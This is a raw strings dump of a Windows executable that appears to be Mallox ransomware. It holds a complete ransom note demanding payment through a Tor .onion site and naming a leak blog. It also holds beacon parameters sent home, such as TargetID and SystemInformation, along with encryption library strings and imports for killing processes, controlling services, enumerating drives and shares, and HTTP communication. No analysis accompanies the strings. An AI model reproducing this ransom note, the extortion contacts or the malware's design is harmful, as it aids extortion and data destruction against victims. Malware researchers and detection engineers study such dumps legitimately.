!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@_RDATA
@.reloc
UVWATAUAVAWH
D$xu4G
A_A^A]A\_^]
VWATAUAVAWL
l$PA_A^A]A\_^
S IcC IcR
IcB(IcK
IcR IcK
S8IcC(IcR
IcB0IcK
QIcJ@H
IcS0IcJ H
IcR8IcJHH
IcJ IcC0H
QIcK@H
IcRHIcK8H
IcSHIcK8H
QIcK0H
S`IcB0IcS8IcKHH
ShIcB8IcS8IcJHH
QIcK0H
SpIcB@IcS8IcKHH
SxIcCHIcR8IcJHH
IcC@IcRHIcKHH
IcJHIcCHH
|$ ATAVAWLc
Lcr Lcz(I
A_A^A\
UVWATAUAVAWH
0A_A^A]A\_^]
@USVWATAUAVAWH
I+D$ I
I+D$(I
I+D$0I
I+D$8I
I+D$@I
I+D$HI
E HkEh
E HkEh
D$0IkD$x
D$(IkD$p
D$ IkD$h
G0HkGx
G(HkGp
G HkGh
A_A^A]A\_^[]
IcK H3
C HcC H3
C IcK(H3
C(HcC(H3
C(IcK0H3
C0HcC0H3
C0IcK8H3
C8HcC8H3
C8IcK@H3
C@HcC@H3
C@IcKHH3
CHHcCHH3
UVWATAUAVAWH
A_A^A]A\_^]
SUVWATAUAVAWH
8A_A^A]A\_^][
|$ AVH
t$ WAVAWH
@A_A^_
@SUWAVAWH
fD9<Zu
0A_A^_][
0A_A^_][
SWAUAVH
HA^A]_[
L$ SWH
L$ SUVWH
\$ UVWAVAWH
A_A^_^]
\$ UVWH
\$ UVWH
@SVWAVH
HA^_^[
UWATAVAWH
A_A^A\_]
d$ UAVAWH
@SUATAUAVH
A^A]A\][
|$ AVH
@UWAUAWH
D$`H;U
D$Hf9X s
f;Y s_H95
A_A]_]
unknown
|$ UATAUAVAWH
u!D9|$h|
u&D9|$h| H
D9|$h|
u4D9|$h|-I
D9|$h|
9t$h~>I
A_A^A]A\]
VWATAVAWH
A_A^A\_^
t$ AVH
t$ AVH
UVWATAUAVAWH
A_A^A]A\_^]
WAVAWH
t$ WATAUAVAWH
0A_A^A]A\_
\$ VAVAWH
A_A^^
\$ VAVAWH
A_A^^
UVWATAUAVAWH
A_A^A]A\_^]
gfffffffH
@SUVWAVH
A^_^][
A^_^][
@USVAUAWH
A_A]^[]
@USVWAUAVAWH
C@H98t$H
A_A^A]_^[]
^XH9nHu
^XH9nHu
\$ UVWAVAWH
0A_A^_^]
UWATAVAWH
A_A^A\_]
SVWATAUAVAWH
pA_A^A]A\_^[
SVWATAUAVAWH
A_A^A]A\_^[
SVWATAUAVAWH
pA_A^A]A\_^[
SVWATAUAVAWH
pA_A^A]A\_^[
UWATAVAWH
A_A^A\_]
@SUWAVH
(A^_][
(A^_][
UVWATAUAVAWH
C@H98t$H
)D$0M+
A_A^A]A\_^]
\$hH;y
@SVATAUAWH
0A_A]A\^[
@SVAVAWH
(A_A^^[
@SUVATH
8A\^][
UWATAVAWH
A_A^A\_]
t$ WATAUAVAWH
@A_A^A]A\_
t$ WATAUAVAWH
A_A^A]A\_
@SVWATAUAVAWH
@A_A^A]A\_^[
@8k(uRH
fF9$@u
D$ H;U@t
@SVWATAUAVAWH
gfffffffI
fffffff
gfffffffH
@A_A^A]A\_^[
@USVWATAUAVH
D$DE9e
D$DA;E
A^A]A\_^[]
t$ WATAUAVAWH
A_A^A]A\_
@WATAVAWH
HA_A^A\_
t$ WATAUAVAWH
A_A^A]A\_
t$ WAVAWH
@A_A^_
@SWATAUAVH
@A^A]A\_[
@USVWAVAWH
L$PH9A
D$`@8q(t
A_A^_^[]
\$@9\$\
fB94Bu
fB94Bu
fB94Bu
\$hH;\$pt.H
\$@;\$\
s WATAUAVAWH
A_A^A]A\_
@SVWATAUAVAWH
PA_A^A]A\_^[
l$ VWAVH
@SUVWH
UVWATAUAVAWH
@A_A^A]A\_^]
l$ VAVAWH
A_A^^
A_A^^
@SUVWAVH
PA^_^][
@SWATAUAWH
C H9C8u*H
C H9C8u0H
C H9C8u!2
A_A]A\_[
t$ WATAWH
A_A\_
A_A\_
SUVWATAUAVAWH
A_A^A]A\_^][
UVWAUAWH
A_A]_^]
@SUVWATAUAWH
\$ fff
0A_A]A\_^][
|$ AVH
UVWATAUAVAWH
A_A^A]A\_^]
%3333D3
@UVATH
%3333D3
@UVATH
\$ UVWAVAWH
A_A^_^]
L$ AWH
@VATAWH
A_A\^
A_A\^
A_A\^
@SWATAUAVH
A^A]A\_[
A^A]A\_[
|$ AVAWD
|$0A_A^
|$ ATAUAVAWD
A_A^A]A\
|$ ATAUAVAWD
A_A^A]A\
UVWATAUAVAWH
A_A^A]A\_^]
\$ WATAWH
A_A\_
A_A\_
@SUWATAUH
A]A\_][
A]A\_][
|$ ATAVAWH
A_A^A\
t$ WATAUAVAWH
A_A^A]A\_
t$ WATAUAVAWH
A_A^A]A\_
|$ AVH
VAVAWH
0A_A^^
0A_A^^
0A_A^^
0A_A^^
@USATAUAWH
A_A]A\[]
@SWAUAVH
(A^A]_[
(A^A]_[
@SUWAUAVH
A^A]_][
A^A]_][
UVWAWH
(A__^]
(A__^]
|$ UATAUAVAWH
A_A^A]A\]
WAVAWH
A_A^_
A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
t$ UWAVH
l$ VWAVH
UVWATAUAVAWH
l$!u4H
A_A^A]A\_^]
@UVAVH
@USVWAWH
A__^[]
@USVWH
t$ WATAUAVAWH
A_A^A]A\_
@SUVWAVH
A^_^][
@UVAWH
|$ AVH
D$DvT2
|$ UATAUAVAWH
ML3MP#
ML3MH#
UT3MLD
MD3MH#
UP3MHD
MD3M@#
UL3MDD
M@3M<#
M<3M8#
M83MT#
A_A^A]A\]
WAVAWH
A_A^_
@USAVAWH
A_A^[]
t$ WATAUAVAWH
A_A^A]A\_
|$ AVH
@VWAVH
t$ WATAUAVAWH
A_A^A]A\_
|$ AVH
\$ UVWH
@SUVWATAUAVAWH
H3<$H3|$
?H3|$ H
xA_A^A]A\_^][
t$ WATAUAVAWH
3D$8A3
D$$3D$
3D$@A3
3D$<A3
D$$3D$
3D$,3D$ A3
3D$(A3
3D$4A3
3D$,D3
3D$$E3
3D$ A#
3D$03D$
D$(3D$
3D$83D$
3D$,3D$8
3D$,3t$4D
63l$@D
A_A^A]A\_
|$ AVH
\$ UVWH
|$ UATAUAVAWH
A_A^A]A\]
WAVAWH
A_A^_
@SWAVAWH
A_A^_[
u/HcH<H
T$`A9r
f#D$@H
l$ VWAVH
@UAVAWH
D8L$0u`
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
WATAUAVAWH
A_A^A]A\_
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
d$dD;d$l
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
WAVAWH
A_A^_
WAVAWH
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
SVWATAUAWH
L!d$(L!d$@D
D$HL9gXt
A_A]A\_^[
B(I9A(u
SVWATAUAVAWH
0A_A^A]A\_^[
SVWATAUAVAWH
A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
D$ I;R
D$ I9P
WATAUAVAWH
A_A^A]A\_
vyfffff
vyfffff
fffffff
fffffff
@USVWATAVAWH
A_A^A\_^[]
@USVWATAVAWH
A_A^A\_^[]
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
ryf;\$l
ref;\$t
rQf;\$|
f;\$4r
f;\$<r
f;\$Dr
r|f;\$l
rhf;\$t
rTf;\$|
A_A^A]A\_^]
S(HcS0
S(HcS0
S(HcS0
S(HcS0
S(HcS0
S(HcS0
UWATAVAWH
A_A^A\_]
D$@H;F
D$@H;F
kL@8o(u
<htl<jt\<lt4<tt$<wt
|$ UATAUAVAWH
A_A^A]A\]
t$ WATAUAVAWH
c@D9kHtwH
l$0Lc@
A_A^A]A\_
t$ WATAUAVAWH
|T4fD;
c@D9kHtkH
l$0Lc@
A_A^A]A\_
D$18F(u
WAVAWH
A_A^_
WAVAWH
A_A^_
` UAVAWH
D$0@8{
p*W4H
p*W4H
|$ AVH
UVWATAUAVAWH
rsf;\$d
r_f;\$l
rKf;\$t
r7f;\$|
f;\$4r
f;\$<r
rvf;\$d
rbf;\$l
rNf;\$t
r:f;\$|
A_A^A]A\_^]
VWATAVAWH
0A_A^A\_^
T$`fA;
u3HcH<H
WATAUAVAWH
A_A^A]A\_
UVWAVAWH
0A_A^_^]
WAVAWH
A_A^_
WAVAWH
A_A^_
p0R^G'
WAVAWH
fE98t'
0A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
9Cu,fD9y
fB9<{u
fD9,pu
t$`fD9+t$I
L$ SUVWH
WATAUAVAWH
0A_A^A]A\_
\$ UVWATAUAVAWH
fD9,Au
A_A^A]A\_^]
\$ UVWATAUAVAWH
f9t$bu
A_A^A]A\_^]
H9L$Ht?H
UVWATAUAVAWH
fE9,Fu
A_A^A]A\_^]
|$ AVH
t$ UWAUAVAWH
A_A^A]_]
s WATAUAVAWH
D$h9t$P
A_A^A]A\_
SUVWATAVAWH
A_A^A\_^][
u$D8r(t
D81uUL9r
uED8r(t
vAD8s(t
f9)u4H9j
u%@8j(t
t$ WATAUAVAWH
gfffffffH
A_A^A]A\_
{ AUAVAWH
0A_A^A]
t$xt*3
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
L$ VWAVH
fD94H}aD
UVWAVAWH
A8^8}SD
u,9\$0~LL
PA_A^_^]
fD9t$b
WATAUAVAWH
A_A^A]A\_
p0R^G'
L$ VWAVH
l$ VWATH
u1!D$0H
UVWATAUAVAWH
PA_A^A]A\_^]
@UATAUAVAWH
A_A^A]A\]
u$D8r(t
fD91uTL9r
uED8r(t
v@D8s(t
UVWATAUAVAWH
PA_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H9>u+A
@USVWATAUAVH
D8t$ht
D8t$ht
A^A]A\_^[]
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
t$ WATAUAVAWH
D!|$xA
A_A^A]A\_
ATAVAWH
0A_A^A\
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
@UATAUAVAWH
e0A_A^A]A\]
fB9<Hu
fB9<@u
fB9<Bu
fB9,Nu
fB9,Nu
fB9,Nu
fA9,Au
fB94Ou
t}f91txH
x ATAVAWH
A_A^A\
x ATAVAWH
fD9 tMH
fG9$Ou
0A_A^A\
fB9<Hu
fB9<@u
fB9<Bu
fD94Au
fD94iu
tSf91tNH
t^;\$0tQ
WAVAWH
A_A^_
@USVWATAVAWH
tyfD9 tsH
tQfD9 tK
fD9$Hu
@A_A^A\_^[]
WATAVH
0A^A\_
E80t"A
fD94Q}
WATAVH
0A^A\_
@USVWATAUAVAWH
xA_A^A]A\_^[]
@UAVAWH
e0A_A^]
@SUVWATAVAWH
A_A^A\_^][
WAVAWH
@A_A^_
@USVWATAVAWH
A_A^A\_^[]
WATAUAVAWH
0A_A^A]A\_
D$0H9D$8
WAVAWH
A_A^_
UVWATAUAVAWH
fB9<I}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
VATAUAVAWH
0A_A^A]A\^
@USVWATAUAVAWH
H!D$ H
xA_A^A]A\_^[]
x ATAVAWH
@A_A^A\
s WAVAWH
0A_A^_
u~9t$Xt
UATAUAVAWH
A_A^A]A\]
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
WAVAWH
D8|$`t
A_A^_
UVWATAUAVAWH
@A_A^A]A\_^]
ffffff
fffffff
@SUVWATAVAWH
@A_A^A\_^][
VATAUAVAWH
0A_A^A]A\^
\$ UVWATAUAVAWH
s2fE9)I
fE9)fA
D$pfA;
0fD9l$pu
fD9l$pt
0A_A^A]A\_^]
l$ VWATAVAWH
0A_A^A\_^
AUAVAWH
A_A^A]
UVWATAUAVAWH
@8t$HtzL
`A_A^A]A\_^]
x ATAVAWH
@8~8t
@8~0tM
A_A^A\
ATAVAWH
A_A^A\
USVWAVH
A^_^[]
LcA<E3
fffffff
ffffff
vKfffff
fffffff
fffffff
bad allocation
bad function call
success
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
device or resource busy
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid argument
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
no such process
not a directory
not a socket
not a stream
not connected
not enough memory
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
resource deadlock would occur
resource unavailable try again
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
unknown error
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
(null)
CorExitProcess
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
AreFileApisANSI
CompareStringEx
EnumSystemLocalesEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
LCIDToLocaleName
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
_hypot
_nextafter
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
expand 32-byte k
Your data has been stolen and encrypted
We will delete the stolen data and help with the recovery of encrypted files after payment has been made
Do not try to change or restore files yourself, this will break them
We provide free decryption for any 3 files up to 3MB in size on our website
How to contact with us:
1) Download and install TOR browser by this link: https://www.torproject.org/download/
2) If TOR blocked in your country and you can't access to the link then use any VPN software
3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
4) Copy your private ID in the input field. Your Private key: {id}
5) You will see chat, payment information and we can make free test decryption here
Our blog of leaked companies:
wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
!wt$Kr!
!wt$Kr!
@=M`kn
@ABCDEFGHIJKLMNO
Q !"#$%&'()*+,-./01234567
Ladies and Gentlemen of the class of '99: If I could offer you only one tip for the future, sunscreen would be it.
@ABCDEFG
Any submission to the IETF intended by the Contributor for publication as all or part of an IETF Internet-Draft or RFC and any statement made within the context of an IETF activity is considered an "IETF Contribution". Such statements include oral statements in IETF sessions, as well as written and electronic communications made at any time or place, which are addressed to
AY|QWH
m$:MlBo
bCryptographic Forum Research Group
'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe:
All mimsy were the borogoves,
And the mome raths outgrabe.
#Now is t
"3DUfw
"3DUfw
ZcXcbT>T*H0
Single block msg
6I*h<8
"3DUfw
"3DUfw
i@%?{0
"3DUfw
-<KZix
Single block msg
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
8- oVX]
""""""""""""""""
""""""""""""""""
<Se>/E
B26EE} vk
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
message digest
abcdefghijklmnopqrstuvwxyz
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
12345678901234567890123456789012345678901234567890123456789012345678901234567890
u.EW=K9
message digest
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
12345678901234567890123456789012345678901234567890123456789012345678901234567890
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
D7q/;M
abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmnhijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu
EMD#d<
; D(V2
Unknown exception
bad array new length
string too long
map/set too long
iostream
bad cast
bad locale name
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
ProductName
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%s %s, %s, %s, %s
0.%llu
&size_of_hdd=
&max_size_of_file=
&SystemInformation=
&TargetID=
%s|%s|%s|%d
89A72EF01
PowrProf.dll
PowerSetActiveScheme
NtQueryObject
ntdll.dll
user32.dll
ShutdownBlockReasonCreate
invalid string position
vector too long
iostream stream error
NtQuerySystemInformation
AES-128-ECB
AES-192-ECB
AES-256-ECB
AES-128-CBC
AES-192-CBC
AES-256-CBC
AES-128-CFB128
AES-192-CFB128
AES-256-CFB128
AES-128-OFB
AES-192-OFB
AES-256-OFB
AES-128-CTR
AES-192-CTR
AES-256-CTR
AES-128-XTS
AES-256-XTS
AES-128-GCM
AES-192-GCM
AES-256-GCM
AES-128-CCM
AES-192-CCM
AES-256-CCM
AES-128-CCM*-NO-TAG
AES-192-CCM*-NO-TAG
AES-256-CCM*-NO-TAG
CAMELLIA-128-ECB
CAMELLIA-192-ECB
CAMELLIA-256-ECB
CAMELLIA-128-CBC
CAMELLIA-192-CBC
CAMELLIA-256-CBC
CAMELLIA-128-CFB128
CAMELLIA-192-CFB128
CAMELLIA-256-CFB128
CAMELLIA-128-CTR
CAMELLIA-192-CTR
CAMELLIA-256-CTR
CAMELLIA-128-GCM
CAMELLIA-192-GCM
CAMELLIA-256-GCM
CAMELLIA-128-CCM
CAMELLIA-192-CCM
CAMELLIA-256-CCM
CAMELLIA-128-CCM*-NO-TAG
CAMELLIA-192-CCM*-NO-TAG
CAMELLIA-256-CCM*-NO-TAG
ARIA-128-ECB
ARIA-192-ECB
ARIA-256-ECB
ARIA-128-CBC
ARIA-192-CBC
ARIA-256-CBC
ARIA-128-CFB128
ARIA-192-CFB128
ARIA-256-CFB128
ARIA-128-CTR
ARIA-192-CTR
ARIA-256-CTR
ARIA-128-GCM
ARIA-192-GCM
ARIA-256-GCM
ARIA-128-CCM
ARIA-192-CCM
ARIA-256-CCM
ARIA-128-CCM*-NO-TAG
ARIA-192-CCM*-NO-TAG
ARIA-256-CCM*-NO-TAG
DES-ECB
DES-CBC
DES-EDE-ECB
DES-EDE-CBC
DES-EDE3-ECB
DES-EDE3-CBC
CHACHA20
CHACHA20-POLY1305
AES-128-KW
AES-192-KW
AES-256-KW
AES-128-KWP
AES-192-KWP
AES-256-KWP
RIPEMD160
SHA224
SHA256
SHA384
SHA512
SHA3-224
SHA3-256
SHA3-384
SHA3-512
ffffff
.text$di
.text$mn
.text$mn$00
.text$mn$21
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$00
.rdata$T
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.tls$ZZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
lstrlenW
QueryPerformanceCounter
OutputDebugStringW
MoveFileW
GetLogicalDrives
FindFirstFileExW
FindFirstVolumeW
EnterCriticalSection
GetCommandLineW
FindNextFileW
GetCurrentProcess
WriteFile
GetUserDefaultLangID
GetModuleFileNameW
WaitForMultipleObjects
LeaveCriticalSection
InitializeCriticalSection
SetErrorMode
GetQueuedCompletionStatus
lstrlenA
FindClose
WaitForSingleObject
CreateFileW
GetFileAttributesW
GetCurrentThreadId
GetModuleHandleA
GetLocaleInfoA
PostQueuedCompletionStatus
MultiByteToWideChar
GetLastError
SetEvent
GetDiskFreeSpaceExW
GetCurrentThread
TerminateThread
LoadLibraryA
CloseHandle
GetNativeSystemInfo
CreateThread
SetVolumeMountPointW
GetProcAddress
LocalFree
DeleteCriticalSection
ExitProcess
GetCurrentProcessId
GetModuleHandleW
CopyFileW
GetVolumePathNamesForVolumeNameW
lstrcpyW
SleepEx
GetDiskFreeSpaceExA
CreateEventA
FindNextVolumeW
lstrcmpiW
CreateIoCompletionPort
GetTickCount
lstrcmpW
GetDriveTypeW
GetComputerNameA
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
QueryDosDeviceW
GetFinalPathNameByHandleW
K32GetModuleFileNameExW
DuplicateHandle
CreateEventW
GetWindowsDirectoryW
FindVolumeClose
GetFileType
GetTickCount64
lstrcatW
GetSystemTimeAsFileTime
ReadFile
GetFileSizeEx
SetEndOfFile
SetFileAttributesW
SetFilePointerEx
SleepConditionVariableCS
WakeConditionVariable
InitializeConditionVariable
GetSystemInfo
GlobalMemoryStatusEx
KERNEL32.dll
GetCursorPos
RegisterClassW
CreateWindowExW
MessageBoxW
DefWindowProcW
USER32.dll
GetTokenInformation
CryptReleaseContext
OpenThreadToken
RegOpenKeyExW
RegOpenKeyExA
StartServiceW
OpenProcessToken
RegSetValueExW
OpenSCManagerW
CryptGenRandom
RegQueryValueExA
CloseServiceHandle
CryptAcquireContextW
RegCloseKey
CreateServiceW
AdjustTokenPrivileges
LookupPrivilegeValueW
QueryServiceStatusEx
EnumServicesStatusW
OpenServiceW
ChangeServiceConfigW
QueryServiceConfigW
EnumDependentServicesW
ControlService
FreeSid
SetNamedSecurityInfoW
SetEntriesInAclW
AllocateAndInitializeSid
ADVAPI32.dll
ShellExecuteW
CommandLineToArgvW
SHELL32.dll
BCryptGenRandom
bcrypt.dll
NetShareEnum
NetApiBufferFree
NETAPI32.dll
wnsprintfA
StrCmpNIW
StrCmpNW
StrStrIW
PathFileExistsW
wnsprintfW
UrlEscapeA
UrlUnescapeA
SHDeleteKeyW
SHLWAPI.dll
GetIpNetTable
IPHLPAPI.DLL
WS2_32.dll
HttpOpenRequestW
InternetQueryOptionW
InternetQueryDataAvailable
InternetOpenW
InternetCrackUrlW
HttpSendRequestW
InternetCloseHandle
InternetConnectW
InternetSetOptionW
InternetReadFile
WININET.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
ReleaseSRWLockExclusive
AcquireSRWLockExclusive
WakeAllConditionVariable
SleepConditionVariableSRW
IsDebuggerPresent
GetStartupInfoW
InitializeSListHead
GetStringTypeW
WideCharToMultiByte
InitializeCriticalSectionEx
EncodePointer
DecodePointer
LCMapStringEx
GetCPInfo
RtlUnwindEx
RtlPcToFileHeader
RaiseException
SetLastError
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
GetModuleHandleExW
GetStdHandle
HeapReAlloc
HeapFree
HeapAlloc
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
LCMapStringW
GetLocaleInfoW
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
IsValidCodePage
GetACP
GetOEMCP
GetCommandLineA
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
SetStdHandle
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
HeapSize
ReadConsoleW
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
mallox
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVbad_function_call@std@@
.?AVbad_exception@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVfailure@ios_base@std@@
.?AVruntime_error@std@@
.?AVsystem_error@std@@
.?AV<lambda_1>@?1??WinMain@@YAHPEAUHINSTANCE__@@0PEADH@Z@
.?AVbad_cast@std@@
.?AV_System_error@std@@
.?AV<lambda_3>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@
.?AV<lambda_1>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@
.?AV<lambda_2>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@
.?AVtype_info@@
.?AV_Locimp@locale@std@@
.?AVCryptoWr@@
.?AVStatus@@
.?AVFileWrapper@@
.?AVEncrypt@@
.?AVFileObj@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_stringbuf@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@
.?AV?$_Func_impl_no_alloc@V<lambda_1>@?1??WinMain@@YAHPEAUHINSTANCE__@@0PEADH@Z@X$$V@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AVios_base@std@@
.?AVerror_category@std@@
.?AV?$ctype@D@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV_Facet_base@std@@
.?AU_Crt_new_delete@std@@
.?AV?$_Iosb@H@std@@
.?AV_Iostream_error_category2@std@@
.?AV?$numpunct@D@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_iostream@_WU?$char_traits@_W@std@@@std@@
.?AUctype_base@std@@
.?AV?$_Func_base@X$$V@std@@
.?AV?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AVfacet@locale@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@_WU?$char_traits@_W@std@@@std@@
.?AV?$ctype@_W@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AVProcessKiller@@
.?AVserviceslist@@
.?AV?$_Func_impl_no_alloc@V<lambda_3>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@X$$V@std@@
.?AV?$_Func_impl_no_alloc@V<lambda_2>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@X$$V@std@@
.?AV?$_Func_impl_no_alloc@V<lambda_1>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@X$$V@std@@
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
LC_ALL
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
((((( H
((((( H
(
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
api-ms-win-core-datetime-l1-1-1
